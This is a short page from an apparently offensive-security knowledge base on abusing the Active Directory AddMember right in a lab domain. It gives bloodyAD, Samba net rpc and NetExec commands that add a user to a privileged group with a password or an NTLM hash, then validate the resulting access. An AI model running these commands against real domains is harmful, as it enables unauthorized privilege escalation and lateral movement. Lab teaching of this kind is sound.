Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / ACL Abuse / AddMember / Techniques

Linux

Set variables:

export DC=10.10.10.200
export DOMAIN=ootw.local

Add a controlled user to a group with bloodyAD:

bloodyAD -d $DOMAIN --host $DC -u attacker.user -p 'Password123!' add groupMember 'Workstation Admins' alice.wright

With an NTLM hash:

bloodyAD -d $DOMAIN --host $DC -u attacker.user -p :NTLM_HASH add groupMember 'Workstation Admins' alice.wright

Alternative with Samba tooling:

net rpc group addmem 'Workstation Admins' alice.wright -U 'OOTW/attacker.user%Password123!' -S $DC

Validate membership:

nxc ldap $DC -d $DOMAIN -u alice.wright -p 'StudentPass2026!' --groups

Validate the resulting access:

nxc smb 10.10.10.201 -d $DOMAIN -u alice.wright -p 'StudentPass2026!'